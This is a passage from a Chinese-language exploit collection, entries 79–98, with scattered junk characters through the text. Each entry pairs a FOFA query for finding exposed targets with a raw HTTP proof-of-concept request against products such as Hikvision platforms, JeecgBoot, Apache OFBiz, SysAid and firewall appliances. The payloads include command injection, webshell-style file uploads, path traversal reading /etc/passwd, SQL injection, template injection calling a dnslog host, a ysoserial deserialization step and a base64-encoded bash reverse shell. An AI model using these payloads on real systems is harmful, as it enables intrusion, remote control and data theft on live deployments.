+ d6 O' z% q) R' J1 E8 l/ g. p+ @, R
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
9 \5 |4 D* m8 V' N1 {$ HHost: x.x.x.x
8 c' j- q4 | d! [6 X' d8 c( ~" I+ E' D4 J
! B D, ~* P+ f5 H. E' g
79. BYTEVALUE 百为流控路由器远程命令执行
. ?$ \) J) X7 Y6 O6 O/ XFOFA:BYTEVALUE 智能流控路由器. R1 s% P. y1 U) \9 `2 M3 i
GET /goform/webRead/open/?path=|id HTTP/1.17 w( h$ ~; _7 a8 u7 K% b) P* l
Host:IP4 Q: q5 V' O/ P. F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 U7 u' i6 V6 S P& gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 S3 b5 {' U1 t0 j, XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 X( r) u) @7 Y' K' A; ~, I: [Accept-Encoding: gzip, deflate
* s/ K7 k. @2 |- R2 RConnection: close
1 o2 S( n. H# I3 j- iUpgrade-Insecure-Requests: 15 C6 @! I) Y0 G8 q7 Y! T
- @ U% o0 }# I4 ~* I3 D3 }6 A0 D Z' R, O* ?, U9 d
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
/ Z) Q# b( g, Z) V" {FOFA:app="速达软件-公司产品"
$ n# W6 R6 [ C' f! D- ~3 U% c) CPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1' p, u: O# h. z$ _0 Z+ z+ L6 Y& s3 a
Host: x.x.x.x5 u2 R" k8 z$ t2 o: B2 o" \+ ?; _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( D+ d3 p5 G4 E) N
Content-Length: 27
' w3 D' A/ [" x) ]2 M4 @ C( uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 U3 q( A2 P# J7 F( h m
Accept-Encoding: gzip, deflate
9 t, m" _, ?( d+ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ R/ `# e6 }! P- F0 N$ UConnection: close' y1 U; `/ o9 E1 B! W% f- B5 [2 w
Content-Type: application/octet-stream
' J- [) u5 S; ] v, [: V' |Upgrade-Insecure-Requests: 1/ o& N$ }" A% N+ R% C
3 V4 C6 _' r; B<% out.print("oessqeonylzaf");%>/ y! w& V* n8 C J8 K& F3 M( z
! {: H- t) x: c4 Y7 v7 |; j/ p: } h) j& P
- Z0 b z7 Z% v4 e, x! W
GET /xykqmfxpoas.jsp HTTP/1.19 g( p& J0 f4 H) c( W
Host: x.x.x.x
9 P# q2 V: @- I! T2 P. T# qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 O& ?2 D4 a9 R% O3 T' Z8 OConnection: close6 R6 |* [' }" W- D% s8 F
Accept-Encoding: gzip
3 X n/ `' H, b! v$ h* m" \
6 J7 }7 S4 ?6 a" H2 j4 Y) H0 Z! O3 H% t$ O+ P8 ^
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露2 g6 u. l3 l1 t/ S5 E
FOFA:app="uniview-视频监控"
3 R8 n6 k. c& ~ B& Z/ SGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
y; A5 p; l/ ? R* x1 m% m M: gHost: x.x.x.x
/ j& J( l4 {6 b* G( R! E" ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ |0 K$ b: k7 }# k5 oConnection: close7 z0 s- {/ f" Q# C
Accept-Encoding: gzip
1 G% {6 Z0 ]3 T) w5 W
- E" T3 J0 b9 @7 E- |4 D) h- q
1 X; V6 b4 s ^) C9 L82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
b$ C* p2 i/ A" g1 H' x) l. b: F3 mFOFA:app="思福迪-LOGBASE"
& |" B9 g! [" aPOST /bhost/test_qrcode_b HTTP/1.1
' S7 H) x* y" J" S0 g! o, O, f2 eHost: BaseURL. T$ w& T& c5 | s; A; o
User-Agent: Go-http-client/1.1
" |; }" g7 `6 K) B, |Content-Length: 23
' y8 B" s- d( I; h" R; o' }, QAccept-Encoding: gzip+ G2 _' `: x7 D+ X& }
Connection: close
) Z1 ]! }" H Q' d! `. DContent-Type: application/x-www-form-urlencoded
0 u! m- b# Q/ ^% ], i+ gReferer: BaseURL
1 Z; }2 _# [" B; h3 v8 t% s7 i8 A F/ ]+ S. O% I0 i0 H* f2 z2 }
z1=1&z2="|id;"&z3=bhost
0 F9 u% j6 N6 ]7 T* s% B2 m( e# ^( j' }; U* V* E9 v, H( q
' l+ Y1 Y7 @9 g4 {6 u& w6 P83. JeecgBoot testConnection 远程命令执行
5 w5 {+ Z q2 ZFOFA:title=="JeecgBoot 企业级低代码平台"
" H8 b4 c: ~) u/ [% Y# f: p: S! s; ?- v* w
* h( O: G/ c" m+ K3 B( ?% z9 N
POST /jmreport/testConnection HTTP/1.1
4 B+ a7 D4 r0 D' O3 ]Host: x.x.x.x1 V! B$ v% K0 }$ R8 E: t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ t: }: R; O4 |: ^8 f* Y
Connection: close
2 u @+ I, _$ L; YContent-Length: 8881/ Z+ i4 j' K) V m J( L) T
Accept-Encoding: gzip
?. H3 n9 N w2 kCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
- `2 W" W* _+ C6 ]% `1 E0 @* VContent-Type: application/json
! E$ F0 |6 b& v3 M2 x" U* ]3 C* `5 S* d$ \) ~1 Y) {
PAYLOAD
8 c0 @" g+ `4 ?" b0 _% b o8 y: }0 L! V$ p' s/ a4 q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- M2 O3 D' x" r* J5 ^7 O4 N
FOFA:title=="JeecgBoot 企业级低代码平台"
$ e+ L% f. G6 @) r! Q4 w8 w* o
6 O' f0 T7 C! M' F; H0 _
, i! x4 s B+ K- k" U3 Q) o7 F8 N6 }4 v6 W; T6 Z& |
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
% Q- t) C( K8 uHost: 192.168.40.130:80800 F4 I! v6 T( W
User-Agent: curl/7.88.1
/ f5 b# C' j$ fContent-Length: 156
& A' ]& @! q, M0 u- r9 J/ T1 l, D* C9 iAccept: */*3 K; @& P$ `, f$ Q7 w
Connection: close9 n7 F& S( e- ?9 S# l6 i1 t, [
Content-Type: application/json
4 c+ Z% g6 O8 V9 o' n$ E( Z: q9 HAccept-Encoding: gzip
, l- h: i; U. \2 x8 |8 v( P8 z& s- e5 ]
{
' Z7 S5 p5 s q: d "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
" H V6 I* o$ \0 n; p "type": "0"4 k9 P7 b/ O0 \ Y7 H3 d
}
( b1 f) ~3 \+ u2 c8 M" N' f" P( K, Z8 a N# t8 b' x- M$ m
( W- ]( Q# j& ~3 s. W6 r% X2 S85. SysAid On-premise< 23.3.36远程代码执行3 v8 C9 ~" @/ a% i; a, O2 t
CVE-2023-47246
3 J4 V) `, C& {7 S7 Y! h; ]& L4 OFOFA:body="sysaid-logo-dark-green.png"
* w) u! o- o# F1 sEXP数据包如下,注入哥斯拉马1 @/ Y) Y. _' z$ r7 x
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1" B) v% N" m. G
Host: x.x.x.x7 }1 Q6 i3 ~% t) C2 [" c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ w4 H" }( B% w4 F7 \ D) H
Content-Type: application/octet-stream8 z7 W1 d7 L) ~/ q# C
Accept-Encoding: gzip
7 s: y/ N! b4 ^, s0 U, A( `3 {" v! x& U' w& ^7 v% u
PAYLOAD
3 ~4 e2 \9 I* K4 E+ O9 @) m, R0 u0 P
回显URL:http://x.x.x.x/userfiles/index.jsp9 ?% u6 Z+ g/ \, Z" Q2 D& g ]0 _
+ k5 g: a5 k+ q" F0 s! N86. 日本tosei自助洗衣机RCE
( l# ^! `+ f+ a; H rFOFA:body="tosei_login_check.php"
$ A$ b ] W d0 j$ e) J8 ~+ cPOST /cgi-bin/network_test.php HTTP/1.14 O4 x4 H6 o( y4 N/ _! t
Host: x.x.x.x
1 d" g5 c: `. T& U. p9 }User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36% s. L% }: M2 |: S7 o
Connection: close9 h, A( B3 o; M7 R$ y
Content-Length: 44
, ]0 y3 v; k* C$ {* f* TAccept: */*
: ]& m2 u. Y& ]( V3 c. y' B* SAccept-Encoding: gzip" ^" G3 F1 L* N. X3 X+ p" b4 w
Accept-Language: en
7 f& X7 c2 n* E2 E9 E$ e* K9 zContent-Type: application/x-www-form-urlencoded
1 z) p) ?0 ]7 U
+ W @' X* Q" `2 d# k7 a/ vhost=%0acat${IFS}/etc/passwd%0a&command=ping _1 N1 |5 G/ @2 N
( V! d: \" ~1 Z" W! x" v9 h9 Q3 }0 ~
87. 安恒明御安全网关aaa_local_web_preview文件上传* q' b& U( W0 ?7 R
FOFA:title="明御安全网关". }4 x* R1 \1 z
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
# _' K1 i7 y: e/ N- i1 n% gHost: X.X.X.X
4 R$ G! k, B+ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 k- U& K& D2 A% \5 U* J5 ~! bConnection: close
" Y& }0 X6 s8 @- @Content-Length: 198
' N- e& K; s. ]) t7 n1 A0 xAccept-Encoding: gzip5 V) B/ S/ C1 a N9 m9 {9 A
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd+ U- V8 a! v2 }/ L: f* V
4 m$ {6 D) l, E0 |6 T--qqobiandqgawlxodfiisporjwravxtvd1 c6 v/ u w( B) ~- M
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php". D6 b8 c& c, [
Content-Type: text/plain, f4 E0 y( i/ G) u9 b3 W7 B5 D
6 u3 `& A; T$ L4 C/ n( [2 Z
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
" z8 V: K/ ` b. }--qqobiandqgawlxodfiisporjwravxtvd--
$ {) z, W7 D% v( k3 Q$ F% X( J
A0 b5 _0 u5 ^5 W0 J2 {# {6 {* I) ?! D- A, U3 p% S
/jfhatuwe.php8 B' |1 h9 C8 S# v# W( E y
# w$ w' P2 G7 i+ A: i! X
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
# m0 _- {; q: Q6 Q2 \) ^ cFOFA:title="明御安全网关"1 |" j* H* ?# W2 k9 Z7 _
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.11 A* q! t' x, O1 ^' I5 G
Host: x.x.x.xx.x.x.x
, [2 g* }2 R* G7 t" O, \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# g& @2 E$ W* u4 D/ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: f1 c9 y7 ?8 r" P% ]7 i& P. ^Accept-Encoding: gzip, deflate
# w1 ]- W, s3 K' }6 p* l. |' FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: L$ H0 c: |) O: a4 v# d
Connection: close
+ ~2 w* c- F6 }2 X9 w0 M" @1 h
8 `1 g! q3 \9 T0 p# Q/astdfkhl.php+ A+ C" t0 N {
2 ]* @: {' A* g( t2 D
89. 致远互联FE协作办公平台editflow_manager存在sql注入2 V+ o+ B9 I0 ]1 o) g7 D( x. `
FOFA:title="FE协作办公平台" || body="li_plugins_download"
" k( \2 H. l6 i$ w: DPOST /sysform/003/editflow_manager.js%70 HTTP/1.12 y3 G8 A6 S' ?6 [3 N4 ~
Host: x.x.x.x* n* t, ?) O0 i. e5 A! ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; F- V% z5 H8 v+ ]0 W( _' d7 wConnection: close' z; e) v- T: k4 j
Content-Length: 41
2 B& B1 ]+ h2 E& l2 E( F xContent-Type: application/x-www-form-urlencoded
/ T. O% Q. e* b7 l; dAccept-Encoding: gzip( R/ I$ \; |% p3 g% y
1 b# D0 `0 X: W$ noption=2&GUID=-1'+union+select+111*222--+
0 I0 j4 ^0 z4 \% e
' a5 d7 `, y: }: b# b9 t- e3 p( x. {: W2 B7 g1 u9 h. `
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& f" o6 M. l7 \1 a0 l# _2 }
FOFA:icon_hash="-1830859634" s3 B5 W3 f4 V$ J8 C
POST /php/ping.php HTTP/1.13 t" a w" L4 g5 }* b
Host: x.x.x.x+ ~3 w" X) N/ \$ t! b7 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
7 m$ j5 n! {+ P2 S& B) A: hContent-Length: 51, n, a+ n9 n* m1 t% U# j1 w5 y
Accept: application/json, text/javascript, */*; q=0.01
3 P B Q6 W4 [% \Accept-Encoding: gzip, deflate4 C+ O, [ h" P7 w9 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ?$ F; I, Q6 P: C2 @Connection: close
0 _- m, v; `% M6 KContent-Type: application/x-www-form-urlencoded
6 X" O( }7 Z9 a( A3 K) EX-Requested-With: XMLHttpRequest5 ?( W5 I, o, U
9 A7 C" P' B# `- Yjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
8 w/ |4 c( ~& ?% S/ k9 _& H* O: M* _7 C; u n$ c2 S
/ o' T; ~: B( Q* @91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取/ f: D) Z9 N' M3 ?0 W( W
FOFA:title="综合安防管理平台"
# q4 O: M5 q" ~- WGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.16 c. K- i; g2 c7 l% u
Host: your-ip
$ q7 c* x Y; \ `3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ I( I# G* E; Y$ p VAccept-Encoding: gzip, deflate
% e# V( t! f, F1 v7 ~Accept: */* O! f0 j ^3 |: f
Connection: keep-alive5 n; j& J: Q) F: T" W; \
) R. X I" ]6 n/ e/ J
. y. n3 `( F0 O2 _
8 A2 i4 o% Z6 v! J92. 海康威视运行管理中心session命令执行
% h# M: e9 k4 uFastjson命令执行0 Y4 W4 g$ b3 \: @6 Z2 w( C
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
- h3 b# C# V. z, d9 M: G" G, ]POST /center/api/session HTTP/1.1
5 M6 x$ w: r5 ]3 Z& {& tHost:2 j# \# ]+ g" G
Accept: application/json, text/plain, */*& L# T2 F! [# t' r9 K3 F
Accept-Encoding: gzip, deflate
- c5 e G1 g* X4 C7 c, GX-Requested-With: XMLHttpRequest7 a, Q. F- V* H( E
Content-Type: application/json;charset=UTF-88 R! y7 g* Q0 g
X-Language-Type: zh_CN
f7 {# z" F" i3 c1 \" NTestcmd: echo test
, ]! x4 N @ z8 @. {( ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.366 Y9 m/ d- X, f9 L
Accept-Language: zh-CN,zh;q=0.9
1 t. k8 w* e5 q6 h! q0 M+ UContent-Length: 5778
6 Q: S) H2 d$ `2 _/ m/ J8 E8 m" q& X/ j$ f A
PAYLOAD
# Q7 T% @$ ~ [. O# Q
# p: h6 J- _; v I5 k
( Q+ x3 s( g1 B8 e( i2 X) I( a93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传+ N9 c4 z+ u6 T& @* Q/ Q; |; }1 _
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
: y" J! {5 M; E! HPOST /?g=app_av_import_save HTTP/1.1) Y8 }. D- @+ L0 ~7 ]
Host: x.x.x.x
, K1 d, Q0 }/ q# @Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
' C; O7 H0 r8 ?+ v& JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ {/ S+ O& a8 _3 C( i( b1 w7 ^! S, u% A1 [5 O/ w. f& o
------WebKitFormBoundarykcbkgdfx
0 V, o4 Q& @2 @3 s, ]4 i1 b: yContent-Disposition: form-data; name="MAX_FILE_SIZE"$ ]" _ E, ^4 p# }3 j% p: B1 @
- ?. P3 O0 J N$ |
10000000' l: f) f0 J. Y+ @) t4 L5 N
------WebKitFormBoundarykcbkgdfx. f g" E' q" t: ]( A
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"! g% J2 e2 J$ A8 U
Content-Type: text/plain
' Q0 a8 o$ \" o8 g' C( [4 A5 K
1 o1 w. ]. ?" Hwagletqrkwrddkthtulxsqrphulnknxa! M" _, @. I3 k: H" d* P: W
------WebKitFormBoundarykcbkgdfx
& o- y- f, @: n' ~Content-Disposition: form-data; name="submit_post"* r0 a: ~2 T8 x+ \! m! L4 ?
& H8 u! f; W9 T1 qobj_app_upfile
1 R u) J/ X+ S, E/ H$ V0 S------WebKitFormBoundarykcbkgdfx$ }3 z1 q4 E: \# @
Content-Disposition: form-data; name="__hash__"
9 i8 X u% \( m1 G9 [. r2 M1 J2 p( G; K" F9 S8 k% A: p# c
0b9d6b1ab7479ab69d9f71b05e0e94458 B& s6 J, e5 R& b9 [9 b
------WebKitFormBoundarykcbkgdfx--9 b8 K2 y8 K; _4 L( r
0 I3 g v8 D z9 L/ [ s& c
3 z! e4 g( O5 Q1 [% |; e' n
GET /attachements/xlskxknxa.txt HTTP/1.1* [7 f( S# V2 H" _: u
Host: xx.xx.xx.xx
5 B: A0 W: x( f2 BUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! K" P- w- R8 h* G6 |
, ?0 q( e# u& k' `4 _4 F+ p# b# ^ w3 a* k
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" C9 w( V) Q& _0 N
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
" B' E1 X/ c( b4 N$ [8 _5 CPOST /?g=obj_area_import_save HTTP/1.11 V8 w e$ u8 m" ^9 j
Host: x.x.x.x! x$ e" x5 J1 n) M8 d$ D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt v; N- X7 d. O6 y# L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" @& W# f4 _4 n6 y/ {- |
0 [1 Z: i7 C8 r$ k
------WebKitFormBoundarybqvzqvmt
t) ~! H6 Y Z! d5 A+ ~/ {Content-Disposition: form-data; name="MAX_FILE_SIZE"5 m0 S, a4 K+ |& }# G* \( v$ c
# v* t8 b, Z3 [. m; m9 l( J
10000000. N- F% A/ Z1 i5 A% F, z
------WebKitFormBoundarybqvzqvmt( _% ~2 o2 C) p# ^3 H/ n! E
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
: E6 ^% P% _4 T) F. x. B' ~* T1 uContent-Type: text/plain+ d6 o) M) b; p3 [0 S
. Q# u4 t; v0 m- {3 F1 ^ b- Ypxplitttsrjnyoafavcajwkvhxindhmu! ~* ] w9 X W! h1 a5 Q
------WebKitFormBoundarybqvzqvmt
9 t- r" C4 B( a8 m( ~. T$ LContent-Disposition: form-data; name="submit_post"
$ {- Q' y. f6 d# U
( ^$ O0 Q/ A. S9 \9 l7 Hobj_app_upfile( d7 |: Z% V# m: P p: t7 U
------WebKitFormBoundarybqvzqvmt
/ P% q: H# _ H, Q% w2 }$ o. sContent-Disposition: form-data; name="__hash__", c. i' C: Q- T4 b7 g
9 M% X1 m" F- u: f* t8 z
0b9d6b1ab7479ab69d9f71b05e0e9445
3 @5 ?& w v( r------WebKitFormBoundarybqvzqvmt--
" {$ \+ {0 s3 f8 o E
& U: O) t% |& J1 L& `5 Q/ ], z+ `% W/ }8 J0 V
. d9 j7 @+ w& t' E, u
GET /attachements/xlskxknxa.txt HTTP/1.1
% @# o, a' k4 q! R% gHost: xx.xx.xx.xx( N* L+ W! q3 ^: B7 K( N: @
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' A( D' \5 W8 y8 U4 p" |: ^6 {
( e2 J% [% M7 N9 f9 t" k, R+ _
O. u* x5 g4 T* p m
" \5 A, C/ J t6 a I" b
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行) l$ q; M' U+ j! T
CVE-2023-49070
3 t9 [; h6 H& q2 _3 C" WFOFA:app="Apache_OFBiz"8 m l4 J; {7 ?+ t6 r) f% l
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ ~6 f8 A$ U7 `; Z
Host: x.x.x.x) |, ^4 c+ K: Z, h u1 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ t% B, B# w0 A3 d3 i8 {; OConnection: close
* t2 t( [- B# g f+ p1 LContent-Length: 889
: w; c% C0 M& l2 C# xContent-Type: application/xml. z* b, g* Q4 A6 T+ J5 u, n: u, n
Accept-Encoding: gzip1 C% {4 i/ B) _7 x& ?8 U9 o' U
* ~! ?1 V' T1 C3 M4 I+ X) w. T<?xml version="1.0"?>" D @' {: B: c. h# d$ o
<methodCall>( P3 K4 \9 w( ]7 j4 T3 g4 x, s* C
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; A5 }$ N0 w c0 n
<params>
" [# X( O$ I9 V& h: p <param>
" l7 C% J P2 V( i; O( I <value>" _+ c1 W/ {* ~6 j% h. Q
<struct>
9 H3 Z' [( T2 w8 \0 ] <member>; f M; g, p! R; N) n% f a
<name>test</name>
. k4 b( A4 ]! J% a <value>
. d5 @' T5 F1 H7 a: m5 d9 q$ F <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
8 Z0 H) \6 p w) [7 K' P/ ]" J) E" t </value>
' r8 i1 Q! r6 J2 W+ c/ Z </member>
4 _/ z& c9 t4 [ C: b& O6 \+ a+ t( H </struct>3 w: G$ S: j' n+ t' e& Q
</value>
$ W t+ v* e/ e4 h: Y </param>; T( e- V; H1 R' O# K! m
</params>8 n# _) H% j! P0 a5 l0 c
</methodCall>- \4 q$ p9 a6 Q5 s! ]; C
# @( E5 b5 p. i% ^& e
2 n' ?4 B1 ^& M! j1 @7 f5 q用ysoserial生成payload
8 C) W- e* p) Zjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"9 I2 D r4 r( w+ F. j
" C9 B" W7 f1 t1 p$ Z0 [; ] i; c3 p) o O" c
将生成的payload替换到上面的POC8 q2 |" x9 s+ D. u+ f" A, }1 [, \
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
; b% k% G) k. h/ k" aHost: 192.168.40.130:8443
/ Y& _4 X# F0 ?6 kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& _( `2 |! l# VConnection: close( c: O8 S9 |9 ?
Content-Length: 889
- H! R/ z1 Q+ i# Q/ b& O1 N' X8 a. HContent-Type: application/xml0 k. y& M0 ?3 S4 `1 N0 k
Accept-Encoding: gzip
" @* Z/ m; D8 ?+ U5 H, b2 S+ ]
0 `& A# u6 ^/ X Y$ c; DPAYLOAD
: Y9 _ T- }* ~, A/ E5 n2 t/ p) ^, k
# a+ N. s- D2 B/ w4 L! c5 `96. Apache OFBiz 18.12.11 groovy 远程代码执行1 u9 b0 ^7 h5 j
FOFA:app="Apache_OFBiz"5 T$ U) R# v6 K' `
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
4 J! Z5 Y9 N% y7 v$ A0 JHost: localhost:8443) a+ G# ?* R6 u( f# e4 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- D! S4 ^( _+ Z( N% o5 i* r+ |Accept: */*
# ~; L% A0 ]8 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, h, F) j5 Z8 fContent-Type: application/x-www-form-urlencoded- H$ ^7 Y( E9 Q7 r3 e- m4 G7 C. v
Content-Length: 559 `6 c% G4 R- V2 J1 x
/ t. L! F3 S8 i9 w' O0 e. J! egroovyProgram=throw+new+Exception('id'.execute().text);
. X5 a9 E9 [& M3 J1 z) s% d& A6 `1 E( D7 g6 h
( ?- I3 C s/ n7 O
反弹shell
- e9 H A# f7 d% f9 d4 [在kali上启动一个监听3 z, c4 o5 m, n1 i& ]
nc -lvp 7777" j$ `! q+ s3 v
6 i* p7 x( } _: D( ^ z0 g
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- A8 K% x8 X" ]. P& g" a E& t
Host: 192.168.40.130:8443
0 h- i; V. {0 ?. ?8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' N: M7 o+ v* r6 q$ ]( D
Accept: */*: [+ v1 l V1 P. \% Z0 `; ~% L! {% `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; h0 c. o# {/ ]# MContent-Type: application/x-www-form-urlencoded: s$ e% W; ] `8 P" D: A
Content-Length: 71/ |9 i+ D1 i0 e" {. ^; ^% i; _
6 n+ |" q2 w# S3 E/ J: i, FgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();, T) u/ j" T4 Q0 w7 F# P2 l
* u$ z3 `# k) U! W* V' ?' W97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
9 L( @1 n2 Y$ D1 X: k# ^* x w: s( C3 fFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"4 s6 i, ~1 ^; f+ |- r
GET /passport/login/ HTTP/1.1
2 v; p! Y# A; @! nHost: 192.168.40.130:8085# e/ @5 L% H; Z" H' x$ e# F* x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 k+ D5 Q5 e6 Z. K) L
Accept-Encoding: gzip
6 D/ y( Q5 M9 D: `- SConnection: close, \( a3 ]5 i% }" K
Cookie: rememberMe=PAYLOAD
) f* T4 e$ B' T5 V, D h8 AX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"# Z+ R% c3 k; c' u5 |. ~$ C! W& p
" e4 I/ o/ D1 B& b& v" a
P8 L1 d4 p9 R, B3 M( O [0 K
98. SpiderFlow爬虫平台远程命令执行
4 k( L# V% R+ J# NCVE-2024-0195
2 g: p9 e' W6 W) F BFOFA:app="SpiderFlow"
3 N* ]- R$ T4 g% iPOST /function/save HTTP/1.1* S, Q. Q% x5 e( q) B
Host: 192.168.40.130:8088
7 j5 W4 i# n: O6 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# @5 X7 a: d( b/ z+ [
Connection: close/ B) m- T. n# B! B7 C
Content-Length: 121
6 |% ^/ P3 L8 j: LAccept: */*, }* s/ e& G' @# E3 C$ L0 _
Accept-Encoding: gzip, deflate& R: n5 @1 T3 k) Q' \. M9 V& S, Z
